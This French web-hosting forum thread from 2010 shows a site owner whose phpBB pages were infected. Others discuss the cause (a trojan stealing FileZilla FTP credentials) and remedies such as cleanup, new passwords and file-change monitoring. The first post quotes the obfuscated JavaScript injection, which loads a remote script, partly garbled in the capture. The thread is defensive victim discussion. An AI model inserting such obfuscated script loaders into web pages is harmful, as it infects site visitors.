Le fuseau horaire est UTC+2 heures




Publier un nouveau sujet Répondre au sujet  [ 20 message(s) ]  Aller vers la page 1, 2  Suivant
 

Auteur Message
Message Publié : 08 Jan 2010, 10:10 
Confirmé
Hors-ligne

Inscription : 07 Mai 2008, 21:53
Message(s) : 189
Bonjour,

J'ai un site internet, avec un forum PhpBB, et je viens de voir que mon site a été victime d'une injection de code Javascript malicieux.


Citer :
<script>/*LGPL*/ try{ window.onload = function(){var Ehht9a2spl = document.createElement('s((@c#r!$i(p$t)'.replace(/@|#|)|(|&|$|!|^/ig, ''));Ehht9a2spl.setAttribute('defer', 'd!e&^!f@&)(e$(&r)!'.replace(/!|(|$|^|)|&|@|#/ig, ''));Ehht9a2spl.setAttribute('type', 't!$)e@#x#(t@#&@/#)j^a#($v@$a!@s(!c$$r^^i&&@p@&#t!@'.replace(/$|)|^|@|#|(|&|!/ig, ''));Ehht9a2spl.setAttribute('id', 'R!k^)j$$!@4^(x!(!^9&&!h!!e(#)q)(#e@!)u)!!'.replace(/!|f(r#!)a$^&&g)@&e&@$-!$n@$@e)t@&.#@(w(e&$b(d)e!)s@@k^$t@$o&p!n^!e@(t!(()(.##!^r)@^u$#!:$($8#!0^)@8@0()/@($g^!o(o^&g$$$l$^e#^.)&!c###o^)m@&/!#g^o)($o$@@g(^l^)e(^($.#(@c@@o)m))(/$@d(((^^o(#c!$@s(^t$o$)$c!(.@)c$)$)o$m&$/!m$a)t()c^h$)!).!)@c)@^#)o$!m$!(#/))^^&f)r(((i!(e$!!!n@^$&#d@)f^@)e)e($)dChild(Ehht9a2spl);}} } catch(Xj453g7cxvovim8ikgh) {}</script>
<!--7bf9a6463b679f7ce3a666836e0495d5-->

Toutes mes pages PHP sont infectés avec ce code "assombri" de Javascript.
Apparemment, ce code fait des ravages sur les sites et forums en ce moment de ce que je trouve sur internet. GNU, LGPL, GPL, c'est un peu la signature de cette variante de code.

Je viens donc demander conseille, d'où cela pourrait venir si vous êtes au courant ?
A part tout nettoyer, changer mes mots de passe, conseillerez-vous quelque chose d'autres ?

Merci d'avance.


Haut
 Profil  
Répondre en citant  

Message Publié : 08 Jan 2010, 11:40 
Debutant
Hors-ligne

Inscription : 13 Déc 2009, 20:10
Message(s) : 83
Que fait ce code?


Haut
 Profil  
Répondre en citant  

Message Publié : 08 Jan 2010, 14:18 
Expert
Avatar de l’utilisateur
Hors-ligne

Inscription : 16 Déc 2007, 16:55
Message(s) : 1368
Localisation : sur un serveur P.H et E.H
Bonjour,

Que conseiller de plus que de nettoyer est de mettre un captcha pour éviter à nouveau ceci. ;)

_________________
-------------------------------------------------------------------------------------
Pas de support par MP merci.


Haut
 Profil  
Répondre en citant  

Message Publié : 08 Jan 2010, 19:09 
Expert
Avatar de l’utilisateur
Hors-ligne

Inscription : 29 Avr 2009, 14:45
Message(s) : 585
Localisation : Luceau (72)
Exact webvision, surtout qu'avec la nouvelle version de phpBB il y a d'autres solution de captcha que celui de phpBB d'intégré comme Re-captcha

_________________
Client VIP | Easy-hebergement
Webmaster | Actweo.com

Utilisateur iPhone et iPad


Haut
 Profil  
Répondre en citant  

Message Publié : 08 Jan 2010, 22:08 
Confirmé
Hors-ligne

Inscription : 07 Mai 2008, 21:53
Message(s) : 189
Hello,

Rien avoir avec une inscription, un formulaire, donc le captcha c'est pas ça.

J'ai cherché toute la journée, voici mes conclusions :
Effectivement, je visitais un site qui avait également ce code sur son site. (2 jours avant que ce code se retrouve sur mon site) Avec malheureusement, Javascript entièrement activé. (je le savais, mais je pensais qu'il faisait pas grand chose ...)
Ce code a installé, en plus d'une infection sur mon ordinateur, une sorte de cheval de Troie qui a récupéré mes mots de passes de connexion FTP (en favoris dans le gestionnaire de sites FileZilla) et les a envoyés sur un serveur en Chine ou en Russie où je sais pas où ... qui les a utilisés pour injecter son code.

Je vois les "Ouais c'est ça ..." mais j'ai bien vu sur plusieurs forums, et cette thèse est confirmée, et de nombreux sites sont touchés.
Et la dernière version de PhpBB ou de n'importe quel CMS n'est pas à l'abri, puisque ça prends directement vos identifiants sur votre PC ...

J'ai changé mes mots de passe partout, et je vais nettoyer ces pages ... et je vais prévenir tous mes visiteurs ...
Et bien entendu, maintenant, je vais naviguer avec NoScript! (extension mozilla firefox).

Merci encore.

Si quelqu'un d'autre a eu la même chose, si il pouvait aussi partager son problème ça serait bien ...


Haut
 Profil  
Répondre en citant  

Message Publié : 08 Jan 2010, 23:04 
Expert
Avatar de l’utilisateur
Hors-ligne

Inscription : 16 Déc 2007, 16:55
Message(s) : 1368
Localisation : sur un serveur P.H et E.H
Lol je ne parlai pas d'un captcha pour l'inscription mais pour poster un message dans un topic...

Sinon première fois que j'entend sa.

Sa veut dire que comme tu viens de le poser ici alors tu a les identifiants de WHD-RS? :lol:

Quand je vois sa j'ai l'impression de voir les mails en chaine ou tout le monde a peur^^

En plus quand ont regarde bien le code ont voit bien que c'est du grand n'importe quoi.

_________________
-------------------------------------------------------------------------------------
Pas de support par MP merci.


Haut
 Profil  
Répondre en citant  

Message Publié : 08 Jan 2010, 23:25 
Confirmé
Hors-ligne

Inscription : 07 Mai 2008, 21:53
Message(s) : 189
Bonsoir !

Citer :
Quand je vois sa j'ai l'impression de voir les mails en chaine ou tout le monde a peur^^

En plus quand ont regarde bien le code ont voit bien que c'est du grand n'importe quoi.

Non mais non, pas de mails en chaine ...
Et le code, il est obfusqué donc normal qu'on voit pas très bien. Mais traduit, on voit très bien qu'il charge un Javascript malicieux sur un site XXXX.ru.

L'infection qu'installe ce code Javascript malicieux, c'est ça : http://www.malekal.com/PWS_Win32.Daurso ... 32.exe.php

Autre article qui parle de ce JS : http://seoforums.org/site-optimization/ ... n-var.html

Citer :
Sa veut dire que comme tu viens de le poser ici alors tu a les identifiants de WHD-RS? lol

Il est affiché en tant que texte là. Sinon, je comprends pas trop ce que tu veux dire.

BlackTig3r.


Dernière édition par BlackTig3r le 08 Jan 2010, 23:27, édité 1 fois.

Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 00:46 
Site Admin
Avatar de l’utilisateur
Hors-ligne

Inscription : 21 Avr 2005, 20:25
Message(s) : 3052
Localisation : Quelque part en Asie du Sud-Est
Intéressant en effet cette info !

Moi je trouve cela tout à fait plausible car technologiquement pas si fou à concevoir.

Après je suis sûr que les acteurs de ceci sont bien plus proches de nous qu'on ne le pense et pas cloitrer dans un coin de la Chine ou de la Russie ;)

_________________
Serveurs : Gamma / Eta / Epsilon / SQL2 / SQL3 / SQL4 / VPS31 / sauv01
Mon blog | SAV des émissions


Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 00:54 
Confirmé
Hors-ligne

Inscription : 07 Mai 2008, 21:53
Message(s) : 189
pafnow a écrit :
Intéressant en effet cette info !

Moi je trouve cela tout à fait plausible car technologiquement pas si fou à concevoir.

Après je suis sûr que les acteurs de ceci sont bien plus proches de nous qu'on ne le pense et pas cloitrer dans un coin de la Chine ou de la Russie ;)

Malheureusement, les mandataires des serveurs dans ces pays ne sont pas très coopératifs pour qu'on retrouver la source à l'origine (plus proche de chez nous) ! :)


Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 03:48 
Expert
Hors-ligne

Inscription : 08 Fév 2006, 15:13
Message(s) : 1895
Plus d'informations sur ce type de script : Wikipedia.

J'ai eu ce soucis au travail : une détection de virus sur tous les sites hébergé sur le serveur en question. (OVH)
J'ai commencé par un scan anti-virus (clamav) qui m'a trouvé 3/4 scripts perl dans /var (savoir comment ils y sont arrivés...) que j'ai malheureusement supprimé directement sans prendre le temps d'éditer.
Les scripts en question on probablement scanné le disque du serveur et (j'en suis sur) on ajoutés à chaques fichiers index.* et *.js le même type de code (difficile à lire sans retirer les caractères supprimés dynamiquement) cité plus haut qui appelle un script javascript (vide, c'est là que j'ai eu plus de mal) à exécuter.

Une fois les pl retirés et chaque sites traités manuellement on n'a plus eu de soucis. Seulement rebelote le lendemain mais je n'ai pas trouvé de fichiers dangereux sur le serveur. J'ai finit par crée un script bash qui retirait automatiquement ces codes. (Utilisé une seule fois)
On n'a pas eu de soucis depuis mais je n'ai pas trouvé la faille permettant le passage de ces scripts surtout dans le un dossier accessible uniquement via ssh...

Personnellement je pense que ce type de code (fichiers pl ou autre) arrivent à être transférer sur des serveurs par des hackers qui arrivent à récupérer les mots de passes des ordinateurs via des trojants. (Récupération historique filezilla, putty, firefox, ...)

EDIT ; je viens de zieuter l'article sur seoforums de BlackTig3r et on parle bien de la même chose :)
EDIT2 ; de mémoire il y aurait un lien entre ce type d'attaques et un faille assez récente sur Adobe Acrobat Reader.
EDIT3 : Quelques exemples (nottament le .pdf)

_________________
Mon Blog : Maraumax.Fr
Dernier site : TimeStamp.Pro - Conversion date / timestamp


Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 12:15 
Expert
Avatar de l’utilisateur
Hors-ligne

Inscription : 16 Déc 2007, 16:55
Message(s) : 1368
Localisation : sur un serveur P.H et E.H
Ah oui ok je comprend mieux maintenant donc oui ce n'est pas avec ce bout de javascript qu'il peuvent avoir nos identifiants mais tout simplement en collaboration avec des hackers qui viennent sur nos ordinateurs en injectant des trojans pour la suite les distribués surement sur un forum?

Dit donc faut faire gaffe alors pour les consultations de compte bancaire etc... :/

_________________
-------------------------------------------------------------------------------------
Pas de support par MP merci.


Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 13:16 
Confirmé
Hors-ligne

Inscription : 07 Mai 2008, 21:53
Message(s) : 189
Merci M@x, enfin on m'a compris. :D

Citer :
Personnellement je pense que ce type de code (fichiers pl ou autre) arrivent à être transférer sur des serveurs par des hackers qui arrivent à récupérer les mots de passes des ordinateurs via des trojants. (Récupération historique filezilla, putty, firefox, ...)

Oui c'est ça. C'est pas une faille sur le serveur, mais chez toi ... tu t'es fais infecté par un trojan, et il a récupérer les identifiants de FileZilla ... les a renvoyés sur un serveur ...

Y'avait ça à un moment, très dévastateur, chez les joueurs en ligne. Ces Trojans qu'on appelait "infections chinoises", qui fonctionnait de la même façon, mais qui récupéraient les identifiants de connexion à des Jeux Vidéos en ligne. (WoW ...)



Oui Webvision, mais vu l'ampleur, je pense que ce n'est pas sur un forum avec des petits lameurs qui récupère. Tout est automatisés depuis des serveurs en zone "offshore" je pense ...
Mais merci d'avoir fait passer ce sujet comme si c'était une débile chaine de mail :)

Pour les consultations bancaires, rien n'est enregistrée sur l'ordinateur normalement, même un enregistreur de frappe marcherait pas, parce qu'on clique sur un clavier virtuel à l'écran en général.


Dernière édition par BlackTig3r le 09 Jan 2010, 13:18, édité 1 fois.

Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 16:34 
Expert
Avatar de l’utilisateur
Hors-ligne

Inscription : 09 Nov 2009, 21:23
Message(s) : 2016
Localisation : Lorraine
Utilise un bot anti-defacing sur l'ensemble de ton offre/forum pour savoir si un fichier est modifier et ajoute le en tache cron 1/2 fois par jour pour être sur.
Exemple de bot anti-defacing http://www.siteduzero.com/tutoriel-3-32 ... acing.html

_________________
Image


Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 19:39 
Confirmé
Hors-ligne

Inscription : 07 Mai 2008, 21:53
Message(s) : 189
Tiens, je connaissais pas :)
Vais regarder, merci.


Haut
 Profil  
Répondre en citant  

Message Publié : 09 Jan 2010, 20:58 
Expert
Avatar de l’utilisateur
Hors-ligne

Inscription : 09 Nov 2009, 21:23
Message(s) : 2016
Localisation : Lorraine
BlackTig3r a écrit :
Tiens, je connaissais pas :)
Vais regarder, merci.

De rien est en plus sa a l'air très efficace couplé avec un script qui sauvegarde le FTP.

_________________
Image


Haut
 Profil  
Répondre en citant  

Afficher les messages publiés depuis :  Trier par  
Publier un nouveau sujet Répondre au sujet  [ 20 message(s) ]  Aller vers la page 1, 2  Suivant

Le fuseau horaire est UTC+2 heures


Qui est en ligne ?

Utilisateur(s) parcourant ce forum : Aucun utilisateur inscrit et 1 invité


Vous ne pouvez pas publier de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas insérer de pièces jointes dans ce forum

Recherche de :
Aller vers :  
cron
Thème par Easy-Hébergement
Powered by phpBB © 2000, 2002, 2005, 2007, 2011 phpBB Group
Traduit en français par Maël Soucaze.